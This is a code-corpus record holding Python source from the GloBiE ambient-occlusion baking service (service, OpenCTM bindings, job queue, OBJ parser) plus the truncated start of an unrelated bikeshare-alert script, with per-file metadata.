print(aoConfig)\nexcept FileNotFoundError:\n print(\"Config file not found, using standard port\", serverConfig[\"port\"])\n\ntry:\n app.run(host=serverConfig[\"host\"],\n port=serverConfig[\"port\"],\n debug=True,\n server=PasteServer)\nexcept KeyboardInterrupt:\n pass\nfinally:\n bakingMan.stop()\n" }, { "alpha_fraction": 0.5862900018692017, "alphanum_fraction": 0.5913035273551941, "avg_line_length": 33.80537033081055, "blob_id": "adf1102caff717c2f67ee67563e0598396d33327", "content_id": "7968a1c93657d56bb1ed97c772fa3aa4dde2fa10", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10372, "license_type": "permissive", "max_line_length": 79, "num_lines": 298, "path": "/service.py", "repo_name": "cg-saarland/GloBiE", "src_encoding": "UTF-8", "text": "import json\nimport numpy\nimport math\nimport os\nimport argparse\nimport sys\nimport random\n\n# add dependencies for auto-py-to-exe\n# https://github.com/pyinstaller/pyinstaller/issues/4363#issuecomment-522350024\n# import numpy.random.common\n# import numpy.random.bounded_integers\n# import numpy.random.entropy\n\nfrom PIL import Image\nfrom remote import fetch\nfrom pathlib import Path\nfrom urlpath import URL\nfrom util import colorprint, prepareOutFilename, test_scene, joinOutputPath\nfrom remote import CachedFile\n\nimport igxc\nimport scene\nimport visitor\n\ndefault_url = 'default/igcx/test-url'\ndefault_file = 'default/igcx/test-file'\ndefault_out = \"test\"\n\naoConfig = {\"resolution\": 1024}\n\n\ndef generateMap(vertices,\n normals,\n texcoord,\n size=(aoConfig[\"resolution\"], aoConfig[\"resolution\"])):\n import ig_rendering_support\n\n w, h = size\n buff = numpy.zeros((w, h, 4), dtype=numpy.uint8)\n\n ig_rendering_support.bakeAO(buff, vertices, normals, texcoord)\n\n blurred = ig_rendering_support.alphaBlur(buff, w, h)\n\n return Image.frombuffer('RGBA', (w, h), blurred, 'raw', 'RGBA', 0, 1)\n\n\ndef start():\n\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument('--url',\n help='url to igxc resource',\n nargs='?',\n type=str,\n const=default_url)\n group.add_argument('--file',\n help='path to igxc resource',\n nargs='?',\n type=str,\n const=default_file)\n group.add_argument('--test',\n help='use default test scene',\n action='store_true')\n parser.add_argument('--out',\n '-o',\n help='basename of the generated output',\n type=str,\n default=default_out)\n parser.add_argument('--debug',\n help='show debug viewer',\n action='store_true')\n parser.add_argument('--face-normals',\n help='use computed face normals',\n action='store_true')\n args = parser.parse_args()\n dictArgs = vars(args)\n # print(args)\n\n startWithDirectArgs(dictArgs)\n\n\ndef modifyIgxc(igxcJson, outFileName, mapping):\n igxcJson[\"ObjectAmbientOcclusionMaps\"] = {'.': outFileName}\n\n for tObject in igxcJson['Objects']:\n nodeName = tObject[\"Path\"]\n if nodeName in mapping:\n tObject[\"AOTransform\"] = mapping[nodeName]\n\n\ndef startWithDirectArgs(args: dict):\n root = None\n igxcFile = None\n igxcContent = None\n urlArgument = None\n basePath = None\n result = None\n outFileHashBase = \"\"\n outFileNameBase = \"AO_result\"\n\n resolutionValue = aoConfig[\"resolution\"]\n if \"resolution\" in args and args[\"resolution\"] is not None:\n resolutionValue = int(args[\"resolution\"])\n\n if \"url\" in args and args[\"url\"] is not None:\n print('fetch url', args[\"url\"])\n 
urlArgument = URL(args[\"url\"])\n igxcFile = fetch(urlArgument, '.igcx')\n colorprint(\"source: \" + str(urlArgument) + '.igcx', 36)\n elif \"file\" in args and args[\"file\"] is not None:\n igxcFile = Path(args[\"file\"])\n colorprint(\"source: \" + args[\"file\"], 36)\n elif \"igxcContent\" in args and args[\"igxcContent\"] is not None:\n igxcContent = args[\"igxcContent\"]\n colorprint(\"source: bakeDirect POST parameters\", 36)\n\n elif \"test\" in args and args[\"test\"]:\n outFileNameBase = prepareOutFilename(str(random.randint(1, 1e9)),\n resolutionValue)\n root = test_scene()\n colorprint(\"source: test scene\", 36)\n\n if igxcFile is not None:\n basePath = igxcFile.parent\n\n if \"basePath\" in args and args[\"basePath\"] is not None:\n # print(args[\"basePath\"])\n basePath = CachedFile(args[\"basePath\"])\n print(\"basePath:\", basePath)\n\n debug = \"debug\" in args and args[\"debug\"]\n\n if igxcFile is not None:\n\n with igxcFile.open('r') as resource:\n igxcContent = json.load(resource)\n\n # if igxcContent is None:\n # return None\n\n if igxcContent is None:\n print(\"No content in igxc\")\n\n # check if configuration is already done\n if \"Objects\" in igxcContent and igxcContent[\"Objects\"] is not None:\n outFileHashBase = outFileHashBase + json.dumps(igxcContent[\"Objects\"],\n sort_keys=True)\n if \"Hashes\" in igxcContent and igxcContent[\"Hashes\"] is not None:\n outFileHashBase = outFileHashBase + json.dumps(igxcContent[\"Hashes\"],\n sort_keys=True)\n if outFileHashBase == \"\" and urlArgument is not None:\n outFileHashBase = urlArgument\n\n outFileNameBase = prepareOutFilename(outFileHashBase, resolutionValue)\n\n hasImage = os.path.isfile(joinOutputPath(outFileNameBase, 'png'))\n hasMapping = os.path.isfile(joinOutputPath(outFileNameBase, 'json'))\n if hasImage and hasMapping and not debug:\n colorprint(\"Taking from cache ({})\".format(outFileNameBase), 32)\n mappingResult = None\n with open(joinOutputPath(outFileNameBase, 'json'),\n 'r') as mappingInFile:\n mappingResult = json.load(mappingInFile)\n modifyIgxc(igxcContent, outFileNameBase + '.png', mappingResult)\n result = {\n \"urlAoMapImage\": outFileNameBase + '.png',\n \"urlAoMappingJson\": outFileNameBase + '.json',\n \"urlIgxcModified\": outFileNameBase + '.igxc',\n \"urlIgxcOriginal\": outFileNameBase + '_original.igxc',\n \"transforms\": mappingResult,\n \"igxcModified\": igxcContent\n }\n return result\n\n # save unmodified version of igxc\n if igxcContent is not None:\n igxcOutfileName = joinOutputPath(outFileNameBase + \"_original\", 'igxc')\n with open(igxcOutfileName, 'w') as igxcOutfile:\n json.dump(igxcContent,\n igxcOutfile,\n indent=4,\n separators=(',', ': '),\n sort_keys=False)\n\n # result not in cache? 
proceed with baking\n root = None\n try:\n root = igxc.load(igxcContent, basePath)\n except AttributeError as e:\n errorMsg = \"attributes missing in igxc ({})\".format(\" \".join(e.args))\n colorprint(\"startWithDirectArgs: \" + errorMsg, 31)\n print(e)\n result = {\n \"error\": errorMsg,\n \"urlIgxcOriginal\": outFileNameBase + '_original.igxc'\n }\n return result\n except ConnectionError as e:\n errorMsg = \"file referenced in igxc could not be fetched \" + \" \".join(\n e.args)\n colorprint(\"startWithDirectArgs: \" + errorMsg, 31)\n print(e)\n result = {\n \"error\": errorMsg,\n \"urlIgxcOriginal\": outFileNameBase + '_original.igxc'\n }\n return result\n except Exception as e:\n errorMsg = \"igxc couldn't be loaded\"\n colorprint(\"startWithDirectArgs: \" + errorMsg, 31)\n print(e)\n print(type(e))\n result = {\n \"error\": errorMsg,\n \"urlIgxcOriginal\": outFileNameBase + '_original.igxc'\n }\n return result\n\n triCounter = visitor.TriCounter()\n root.accept(triCounter)\n print('total triangles', triCounter.count)\n\n vertices = numpy.ndarray((triCounter.count, 3, 3), dtype=numpy.float)\n normals = numpy.ndarray((triCounter.count, 3, 3), dtype=numpy.float)\n texcoord = numpy.ndarray((triCounter.count, 3, 2), dtype=numpy.float)\n\n meshCounter = visitor.MeshCounter()\n root.accept(meshCounter)\n print('total meshes', meshCounter.count)\n\n amountBucketsX = math.ceil(math.sqrt(meshCounter.count))\n amountBucketsY = math.ceil(meshCounter.count / amountBucketsX)\n print('buckets: {}x{}'.format(amountBucketsX, amountBucketsY))\n uvPacker = visitor.SimplePacker(amountBucketsX, amountBucketsY,\n resolutionValue)\n triExtractor = visitor.TransformedTriExtractor(vertices,\n normals,\n texcoord,\n packer=uvPacker)\n root.accept(triExtractor)\n\n # if face normals should be used, empty normals array\n if \"face_normals\" in args and args[\"face_normals\"] == True:\n normals = numpy.zeros((0, 3, 3), dtype=numpy.float)\n\n # print(vertices)\n # print(texcoord)\n # print(triExtractor.mapping)\n # print(\"Packer:\", uvPacker.i)\n\n img = generateMap(vertices, normals, texcoord,\n (resolutionValue, resolutionValue))\n\n # save AO map image\n output = joinOutputPath(outFileNameBase, 'png')\n print(\"Save output at\", joinOutputPath(outFileNameBase, 'png'))\n img.save(output)\n\n # save AO mapping\n mappingOutfileName = joinOutputPath(outFileNameBase, 'json')\n with open(mappingOutfileName, 'w') as outfile:\n json.dump(triExtractor.mapping,\n outfile,\n indent=4,\n separators=(',', ': '),\n sort_keys=True)\n\n # extend existing IGXC with AO entries\n if igxcContent is not None:\n modifyIgxc(igxcContent, outFileNameBase + '.png', triExtractor.mapping)\n igxcOutfileName = joinOutputPath(outFileNameBase, 'igxc')\n with open(igxcOutfileName, 'w') as igxcOutfile:\n json.dump(igxcContent,\n igxcOutfile,\n indent=4,\n separators=(',', ': '),\n sort_keys=False)\n\n if debug:\n import viewer\n viewer.debug_view(vertices, texcoord, image=img)\n\n result = {\n \"urlAoMapImage\": outFileNameBase + '.png',\n \"urlAoMappingJson\": outFileNameBase + '.json',\n \"urlIgxcModified\": outFileNameBase + '.igxc',\n \"urlIgxcOriginal\": outFileNameBase + '_original.igxc',\n \"transforms\": triExtractor.mapping,\n \"igxcModified\": igxcContent\n }\n return result\n\n\nif __name__ == '__main__':\n start()\n" }, { "alpha_fraction": 0.6387369632720947, "alphanum_fraction": 0.6712413430213928, "avg_line_length": 30.566774368286133, "blob_id": "8a7b85f82a4907c26dcc15362eda30f340661491", "content_id": 
"d5f11262ba28d80695dcb7cc4820847ba80639a0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9691, "license_type": "permissive", "max_line_length": 80, "num_lines": 307, "path": "/openctm/openctm.py", "repo_name": "cg-saarland/GloBiE", "src_encoding": "UTF-8", "text": "# ------------------------------------------------------------------------------\n# Product: OpenCTM\n# File: openctm.py\n# Description: Python API bindings (tested with Python 2.5.2 and Python 3.0)\n# ------------------------------------------------------------------------------\n# Copyright (c) 2009-2010 Marcus Geelnard\n#\n# This software is provided 'as-is', without any express or implied\n# warranty. In no event will the authors be held liable for any damages\n# arising from the use of this software.\n#\n# Permission is granted to anyone to use this software for any purpose,\n# including commercial applications, and to alter it and redistribute it\n# freely, subject to the following restrictions:\n#\n# 1. The origin of this software must not be misrepresented; you must not\n# claim that you wrote the original software. If you use this software\n# in a product, an acknowledgment in the product documentation would be\n# appreciated but is not required.\n#\n# 2. Altered source versions must be plainly marked as such, and must not\n# be misrepresented as being the original software.\n#\n# 3. This notice may not be removed or altered from any source\n# distribution.\n# ------------------------------------------------------------------------------\n\nimport os\nimport sys\nimport inspect\nfrom ctypes import *\nfrom ctypes.util import find_library\n\n# Types\nCTMfloat = c_float\nCTMint = c_int32\nCTMuint = c_uint32\nCTMcontext = c_void_p\nCTMenum = c_uint32\n\n# Constants\nCTM_API_VERSION = 0x00000100\nCTM_TRUE = 1\nCTM_FALSE = 0\n\n# CTMenum\nCTM_NONE = 0x0000\nCTM_INVALID_CONTEXT = 0x0001\nCTM_INVALID_ARGUMENT = 0x0002\nCTM_INVALID_OPERATION = 0x0003\nCTM_INVALID_MESH = 0x0004\nCTM_OUT_OF_MEMORY = 0x0005\nCTM_FILE_ERROR = 0x0006\nCTM_BAD_FORMAT = 0x0007\nCTM_LZMA_ERROR = 0x0008\nCTM_INTERNAL_ERROR = 0x0009\nCTM_UNSUPPORTED_FORMAT_VERSION = 0x000A\nCTM_IMPORT = 0x0101\nCTM_EXPORT = 0x0102\nCTM_METHOD_RAW = 0x0201\nCTM_METHOD_MG1 = 0x0202\nCTM_METHOD_MG2 = 0x0203\nCTM_VERTEX_COUNT = 0x0301\nCTM_TRIANGLE_COUNT = 0x0302\nCTM_HAS_NORMALS = 0x0303\nCTM_UV_MAP_COUNT = 0x0304\nCTM_ATTRIB_MAP_COUNT = 0x0305\nCTM_VERTEX_PRECISION = 0x0306\nCTM_NORMAL_PRECISION = 0x0307\nCTM_COMPRESSION_METHOD = 0x0308\nCTM_FILE_COMMENT = 0x0309\nCTM_NAME = 0x0501\nCTM_FILE_NAME = 0x0502\nCTM_PRECISION = 0x0503\nCTM_INDICES = 0x0601\nCTM_VERTICES = 0x0602\nCTM_NORMALS = 0x0603\nCTM_UV_MAP_1 = 0x0700\nCTM_UV_MAP_2 = 0x0701\nCTM_UV_MAP_3 = 0x0702\nCTM_UV_MAP_4 = 0x0703\nCTM_UV_MAP_5 = 0x0704\nCTM_UV_MAP_6 = 0x0705\nCTM_UV_MAP_7 = 0x0706\nCTM_UV_MAP_8 = 0x0707\nCTM_ATTRIB_MAP_1 = 0x0800\nCTM_ATTRIB_MAP_2 = 0x0801\nCTM_ATTRIB_MAP_3 = 0x0802\nCTM_ATTRIB_MAP_4 = 0x0803\nCTM_ATTRIB_MAP_5 = 0x0804\nCTM_ATTRIB_MAP_6 = 0x0805\nCTM_ATTRIB_MAP_7 = 0x0806\nCTM_ATTRIB_MAP_8 = 0x0807\n\n\ndef get_script_dir(follow_symlinks=True):\n if getattr(sys, 'frozen', False): # py2exe, PyInstaller, cx_Freeze\n path = os.path.abspath(sys.executable)\n else:\n path = inspect.getabsfile(get_script_dir)\n if follow_symlinks:\n path = os.path.realpath(path)\n return os.path.dirname(path)\n\n\n# Load the OpenCTM shared library\nif os.name == 'nt':\n lib = get_script_dir()\n lib = os.path.join(lib, \"openctm.dll\")\n _lib 
= WinDLL(lib)\nelse:\n _libName = find_library('openctm')\n if not _libName:\n raise Exception('Could not find the OpenCTM shared library.')\n _lib = CDLL(_libName)\nif not _lib:\n raise Exception('Could not open the OpenCTM shared library.')\n\n# Functions\nctmNewContext = _lib.ctmNewContext\nctmNewContext.argtypes = [CTMenum]\nctmNewContext.restype = CTMcontext\n\nctmFreeContext = _lib.ctmFreeContext\nctmFreeContext.argtypes = [CTMcontext]\n\nctmGetError = _lib.ctmGetError\nctmGetError.argtypes = [CTMcontext]\nctmGetError.restype = CTMenum\n\nctmErrorString = _lib.ctmErrorString\nctmErrorString.argtypes = [CTMenum]\nctmErrorString.restype = c_char_p\n\nctmGetInteger = _lib.ctmGetInteger\nctmGetInteger.argtypes = [CTMcontext, CTMenum]\nctmGetInteger.restype = CTMint\n\nctmGetFloat = _lib.ctmGetFloat\nctmGetFloat.argtypes = [CTMcontext, CTMenum]\nctmGetFloat.restype = CTMfloat\n\nctmGetIntegerArray = _lib.ctmGetIntegerArray\nctmGetIntegerArray.argtypes = [CTMcontext, CTMenum]\nctmGetIntegerArray.restype = POINTER(CTMuint)\n\nctmGetFloatArray = _lib.ctmGetFloatArray\nctmGetFloatArray.argtypes = [CTMcontext, CTMenum]\nctmGetFloatArray.restype = POINTER(CTMfloat)\n\nctmGetNamedUVMap = _lib.ctmGetNamedUVMap\nctmGetNamedUVMap.argtypes = [CTMcontext, c_char_p]\nctmGetNamedUVMap.restype = CTMenum\n\nctmGetUVMapString = _lib.ctmGetUVMapString\nctmGetUVMapString.argtypes = [CTMcontext, CTMenum, CTMenum]\nctmGetUVMapString.restype = c_char_p\n\nctmGetUVMapFloat = _lib.ctmGetUVMapFloat\nctmGetUVMapFloat.argtypes = [CTMcontext, CTMenum, CTMenum]\nctmGetUVMapFloat.restype = CTMfloat\n\nctmGetNamedAttribMap = _lib.ctmGetNamedAttribMap\nctmGetNamedAttribMap.argtypes = [CTMcontext, c_char_p]\nctmGetNamedAttribMap.restype = CTMenum\n\nctmGetAttribMapString = _lib.ctmGetAttribMapString\nctmGetAttribMapString.argtypes = [CTMcontext, CTMenum, CTMenum]\nctmGetAttribMapString.restype = c_char_p\n\nctmGetAttribMapFloat = _lib.ctmGetAttribMapFloat\nctmGetAttribMapFloat.argtypes = [CTMcontext, CTMenum, CTMenum]\nctmGetAttribMapFloat.restype = CTMfloat\n\nctmGetString = _lib.ctmGetString\nctmGetString.argtypes = [CTMcontext, CTMenum]\nctmGetString.restype = c_char_p\n\nctmCompressionMethod = _lib.ctmCompressionMethod\nctmCompressionMethod.argtypes = [CTMcontext, CTMenum]\n\nctmCompressionLevel = _lib.ctmCompressionLevel\nctmCompressionLevel.argtypes = [CTMcontext, CTMuint]\n\nctmVertexPrecision = _lib.ctmVertexPrecision\nctmVertexPrecision.argtypes = [CTMcontext, CTMfloat]\n\nctmVertexPrecisionRel = _lib.ctmVertexPrecisionRel\nctmVertexPrecisionRel.argtypes = [CTMcontext, CTMfloat]\n\nctmNormalPrecision = _lib.ctmNormalPrecision\nctmNormalPrecision.argtypes = [CTMcontext, CTMfloat]\n\nctmUVCoordPrecision = _lib.ctmUVCoordPrecision\nctmUVCoordPrecision.argtypes = [CTMcontext, CTMenum, CTMfloat]\n\nctmAttribPrecision = _lib.ctmAttribPrecision\nctmAttribPrecision.argtypes = [CTMcontext, CTMenum, CTMfloat]\n\nctmFileComment = _lib.ctmFileComment\nctmFileComment.argtypes = [CTMcontext, c_char_p]\n\nctmDefineMesh = _lib.ctmDefineMesh\nctmDefineMesh.argtypes = [\n CTMcontext,\n POINTER(CTMfloat), CTMuint,\n POINTER(CTMuint), CTMuint,\n POINTER(CTMfloat)\n]\n\nctmAddUVMap = _lib.ctmAddUVMap\nctmAddUVMap.argtypes = [CTMcontext, POINTER(CTMfloat), c_char_p, c_char_p]\nctmAddUVMap.restype = CTMenum\n\nctmAddAttribMap = _lib.ctmAddAttribMap\nctmAddAttribMap.argtypes = [CTMcontext, POINTER(CTMfloat), c_char_p]\nctmAddAttribMap.restype = CTMenum\n\nctmLoad = _lib.ctmLoad\nctmLoad.argtypes = [CTMcontext, c_char_p]\n\nctmSave = 
_lib.ctmSave\nctmSave.argtypes = [CTMcontext, c_char_p]\n\n\ndef read(group, file):\n print('Load', file)\n try:\n ctm = ctmNewContext(CTM_IMPORT)\n ctmLoad(ctm, bytes(str(file), 'utf-8'))\n err = ctmGetError(ctm)\n if err != CTM_NONE:\n raise IOError(\"Error loading file: \" + str(ctmErrorString(err)))\n\n # Interpret information\n hasNormals = (ctmGetInteger(ctm, CTM_HAS_NORMALS) == CTM_TRUE)\n\n method = ctmGetInteger(ctm, CTM_COMPRESSION_METHOD)\n if method == CTM_METHOD_RAW:\n methodStr = \"RAW\"\n elif method == CTM_METHOD_MG1:\n methodStr = \"MG1\"\n elif method == CTM_METHOD_MG2:\n methodStr = \"MG2\"\n else:\n methodStr = \"Unknown\"\n\n triCount = ctmGetInteger(ctm, CTM_TRIANGLE_COUNT)\n vertCount = ctmGetInteger(ctm, CTM_VERTEX_COUNT)\n\n # Print information\n print(\"CTM_FILE_COMMENT:\", str(ctmGetString(ctm, CTM_FILE_COMMENT)))\n print(\" CTM_NAME:\", str(ctmGetString(ctm, CTM_NAME)))\n print(\" Triangle count:\", triCount)\n print(\" Vertex count:\", vertCount)\n print(\" Has normals:\", hasNormals)\n print(\" Method:\", methodStr)\n\n # List UV maps\n uvMapCount = ctmGetInteger(ctm, CTM_UV_MAP_COUNT)\n print(\" UV maps:\", uvMapCount)\n for i in range(uvMapCount):\n print(\" CTM_UV_MAP_\" + str(i + 1) + \": \\\"\" +\n str(ctmGetUVMapString(ctm, CTM_UV_MAP_1 + i, CTM_NAME)) +\n \"\\\", ref = \\\"\" +\n str(ctmGetUVMapString(ctm, CTM_UV_MAP_1 +\n i, CTM_FILE_NAME)) + \"\\\"\")\n\n # List attrib maps\n attribMapCount = ctmGetInteger(ctm, CTM_ATTRIB_MAP_COUNT)\n print(\"Attribute maps:\", attribMapCount)\n for i in range(attribMapCount):\n print(\n \" CTM_ATTRIB_MAP_\" + str(i + 1) + \": \\\"\" +\n str(ctmGetAttribMapString(ctm, CTM_ATTRIB_MAP_1 +\n i, CTM_NAME)) + \"\\\"\")\n\n pindices = ctmGetIntegerArray(ctm, CTM_INDICES)\n pvertices = ctmGetFloatArray(ctm, CTM_VERTICES)\n\n # Get normals\n pnormals = None\n if hasNormals:\n pnormals = ctmGetFloatArray(ctm, CTM_NORMALS)\n\n # Get texture coordinates\n ptexCoords = None\n if uvMapCount > 0:\n ptexCoords = ctmGetFloatArray(ctm, CTM_UV_MAP_1)\n\n mesh = scene.Mesh('ctm')\n\n for i in range(triCount):\n i0, i1, i2 = pindices[i * 3], pindices[i * 3 + 1], pindices[i * 3 +\n 2]\n v0, v1, v2 = pvertices[i0], pvertices[i1], pvertices[i2]\n tri = scene.Triangle(v0, v1, v2)\n mesh.add(tri)\n\n group.add(mesh)\n\n except Exception as e:\n print('Exception occurred:', e)\n\n finally:\n # Free the OpenCTM context\n ctmFreeContext(ctm)\n" }, { "alpha_fraction": 0.5117344260215759, "alphanum_fraction": 0.5151688456535339, "avg_line_length": 32.812904357910156, "blob_id": "b70f8e6c00315a8f2b731c63d7dbe872c6f3654d", "content_id": "a9c452e44c05db6d17e2dfb2e92786cb5641bedc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5241, "license_type": "permissive", "max_line_length": 78, "num_lines": 155, "path": "/bakerman.py", "repo_name": "cg-saarland/GloBiE", "src_encoding": "UTF-8", "text": "import threading\nimport json\n\nfrom collections import namedtuple\nfrom time import sleep\nfrom typing import List\nfrom service import startWithDirectArgs\nfrom util import colorprint\n\nBakingJob = namedtuple('BakingJob', ['jobId', 'jobArgs', \"state\"])\n\n\nclass BakingMan(threading.Thread):\n def __init__(self):\n super().__init__()\n self.isProcessRunning = False\n self.currentId = 0\n self.queue: List[BakingJob] = []\n self.currentJob = None\n self.results: List[BakingJob] = []\n self.running = False\n\n def addJob(self, args):\n self.getUniqueId()\n newJob = 
BakingJob(str(self.currentId), args, \"pending\")\n self.queue.append(newJob)\n return self.currentId\n\n def stop(self, blocking=True):\n self.running = False\n if blocking:\n self.join()\n\n def run(self):\n self.running = True\n while self.running:\n if not self.isProcessRunning:\n if len(self.queue) > 0:\n BakingMan.isProcessRunning = True\n self.currentJob = self.queue.pop(0)\n try:\n self.runJob()\n except FileNotFoundError as e:\n BakingMan.isProcessRunning = False\n colorprint(\n \"File not found for jobId {}\".format(\n self.currentJob.jobId), 31)\n self.currentJob = None\n print(e)\n except json.decoder.JSONDecodeError as e:\n BakingMan.isProcessRunning = False\n colorprint(\n \"JSON not valid for jobId {}\".format(\n self.currentJob.jobId), 31)\n self.currentJob = None\n print(e)\n except Exception as e:\n BakingMan.isProcessRunning = False\n colorprint(\n \"Exception for jobId {}\".format(\n self.currentJob.jobId), 31)\n self.currentJob = None\n print(e)\n\n else:\n sleep(0.5)\n\n def runJob(self):\n colorprint(\n \"Starting runJob with jobId {}\".format(self.currentJob.jobId), 32)\n\n self.currentJob = self.currentJob._replace(state=\"running\")\n output = startWithDirectArgs(self.currentJob.jobArgs)\n\n result = {}\n if \"error\" in output and output[\"error\"] is not None:\n result = {\n \"jobId\": self.currentJob.jobId,\n \"jobArgs\": self.currentJob.jobArgs,\n \"state\": \"error\",\n \"error\": output[\"error\"]\n }\n colorprint(\"Error in startWithDirectArgs\", 31)\n\n else:\n result = {\n \"jobId\": self.currentJob.jobId,\n \"jobArgs\": self.currentJob.jobArgs,\n \"urlAoMapImage\": output[\"urlAoMapImage\"],\n \"urlAoMappingJson\": output[\"urlAoMappingJson\"],\n \"urlIgxcModified\": output[\"urlIgxcModified\"],\n \"urlIgxcOriginal\": output[\"urlIgxcOriginal\"],\n \"transforms\": output[\"transforms\"],\n \"state\": \"finished\",\n \"igxcModified\": output[\"igxcModified\"]\n }\n colorprint(\n \"Finished runJob with jobId {}\".format(self.currentJob.jobId),\n 32)\n\n self.results.append(result)\n self.isProcessRunning = False\n self.currentJob = None\n return result\n\n def getUniqueId(self) -> str:\n self.currentId += 1\n return str(self.currentId)\n\n def hasQueuedJob(self, jobId: str) -> bool:\n for entry in self.queue:\n if entry.jobId == jobId:\n return True\n return False\n\n def isJobFinished(self, jobId: str) -> bool:\n if self.hasJob(jobId):\n for entry in self.results:\n if entry[\"jobId\"] == jobId:\n return True\n return False\n\n def hasJob(self, jobId: str) -> bool:\n if self.currentJob != None and self.currentJob.jobId == jobId:\n return True\n\n for entry in self.results:\n if entry[\"jobId\"] == jobId:\n return True\n\n for entry in self.queue:\n if entry.jobId == jobId:\n return True\n return False\n\n def getJob(self, jobId: str) -> BakingJob:\n if self.currentJob != None and self.currentJob.jobId == jobId:\n return self.currentJob._asdict()\n\n for entry in self.results:\n if entry[\"jobId\"] == jobId:\n return entry\n\n for entry in self.queue:\n if entry.jobId == jobId:\n return entry._asdict()\n return None\n\n def getAllJobs(self) -> List[BakingJob]:\n allJobs = self.results[:]\n for entry in self.queue:\n allJobs.append(json.loads(json.dumps(entry._asdict())))\n if self.currentJob != None:\n allJobs.append(json.loads(json.dumps(self.currentJob._asdict())))\n return allJobs\n" }, { "alpha_fraction": 0.46477824449539185, "alphanum_fraction": 0.4875139892101288, "avg_line_length": 26.94791603088379, "blob_id": 
"a4cd3518d5ffebbd848704e9af953a73cf02adf5", "content_id": "087ce74fec63e0cf4bc8c87764481cb896ac20e4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2683, "license_type": "permissive", "max_line_length": 78, "num_lines": 96, "path": "/wavefront.py", "repo_name": "cg-saarland/GloBiE", "src_encoding": "UTF-8", "text": "import glm\nimport scene\n\n\ndef readVec2(data):\n v = [float(val) for val in data[0:2]]\n return glm.vec2(*v)\n\n\ndef readVec3(data):\n v = [float(val) for val in data[0:3]]\n return glm.vec3(*v)\n\n\nclass Parser(object):\n def __init__(self, group):\n self.vertices = [glm.vec3(0.0)]\n self.normals = [glm.vec3(0.0)]\n self.texcoords = [glm.vec2(0.0)]\n self.mesh = None\n self.group = group\n\n def read_file(self, file):\n for line in file:\n self.parse(line)\n\n def parse(self, line):\n if line.startswith('#'):\n return\n\n values = line.split()\n if len(values) < 2:\n return\n\n attrib = 'parse_%s' % values[0]\n args = values[1:]\n\n if hasattr(self, attrib):\n parse_function = getattr(self, attrib)\n parse_function(args)\n # else:\n # print(\"unable to read line:\", line)\n\n def parse_v(self, args):\n self.vertices.append(readVec3(args))\n\n def parse_vn(self, args):\n self.normals.append(readVec3(args))\n\n def parse_vt(self, args):\n self.texcoords.append(readVec2(args))\n\n def parse_o(self, args):\n self.mesh = scene.Mesh(args[0])\n self.group.add(self.mesh)\n\n def parse_f(self, args):\n if self.mesh is None:\n self.parse_o(['unnamed mesh'])\n\n prim0 = scene.Triangle(*[glm.vec3(0.0), glm.vec3(0.0), glm.vec3(0.0)])\n self.mesh.add(prim0)\n\n for i, v in enumerate(args):\n vidx, tidx, nidx = (list(map(int, [j or 0\n for j in v.split('/')])) +\n [0, 0])[:3]\n\n # wrap index around\n if vidx < 0:\n vidx = len(self.vertices) - vidx\n if tidx < 0:\n tidx = len(self.texcoords) - tidx\n if nidx < 0:\n nidx = len(self.normals) - nidx\n\n if i < 3:\n prim0.vertex(i, self.vertices[vidx], self.texcoords[tidx],\n self.normals[nidx])\n elif i == 3:\n # second triangle for quad face\n prim1 = scene.Triangle(prim0.vertices[0], prim0.vertices[2],\n self.vertices[vidx])\n prim1.texcoords = [\n prim0.texcoords[0], prim0.texcoords[2],\n self.texcoords[tidx]\n ]\n prim1.normals = [\n prim0.normals[0], prim0.normals[2], self.normals[nidx]\n ]\n self.mesh.add(prim1)\n\n\ndef read(group, file):\n parser = Parser(group)\n parser.read_file(file)\n" } ]
19
thealanberman/bikeshare
https://github.com/thealanberman/bikeshare
6310f6a32f0026dcb13077430926d2037aa40ab2
fc716a11a4d1da37e0b2c3935d31d8f3b2b3243a
82956fc28ed36951581b06b86886642b3cbfc726
refs/heads/master
2021-01-12T20:39:42.512158
2016-09-16T07:04:33
2016-09-16T07:04:33
68,359,455
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5918367505073547, "alphanum_fraction": 0.5969387888908386, "avg_line_length": 29.153846740722656, "blob_id": "f01052e816981967f589211a52ab11f5aa04c7fd", "content_id": "e9c08539454d4ebb97c2586764b3f9a3af8d3583", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 784, "license_type": "no_license", "max_line_length": 78, "num_lines": 26, "path": "/bikeshare.py", "repo_name": "thealanberman/bikeshare", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"bikeshare.py: Sends alerts as bikes or docks become scarce at key times.\"\"\"\n\n__author__ = \"Alan Berman\"\n\nimport requests, smtplib\n\ndef main():\n stationId = 65\n url = \"http://feeds.bayareabikeshare.com/stations/stations.json\"\n r = requests.get(url)\n stations = r.json()['stationBeanList']\n response = \"\"\n\n for item in stations:\n if item['id'] == stationId:\n if item['availableBikes'] < 2 or item['availableDocks'] < 2:\n response = str(item['availableBikes']) + \" bikes left. \"\n response += str(item['availableDocks']) + \" open docks. \"\n response += \"%s (#%s)\" % (item['stationName'], item['id'])\n return { 'response': response }\n\nmain()\n\ndef getStationStatus(station, stationId):\n" } ]
1
priyanshumishra1009/loop_basic_question.py
https://github.com/priyanshumishra1009/loop_basic_question.py
047f198cfdb134304518078d3b203689cd29cb4d
e86a2a461368e9c5e74dae8118820ae46b8f7e7e
404793c5a2b82e5bfd19a817881d0bee85472a51
refs/heads/main
2023-06-11T14:24:33.470793
2021-07-07T20:59:40
2021-07-07T20:59:40
null
0
0
null
null
null
null
null
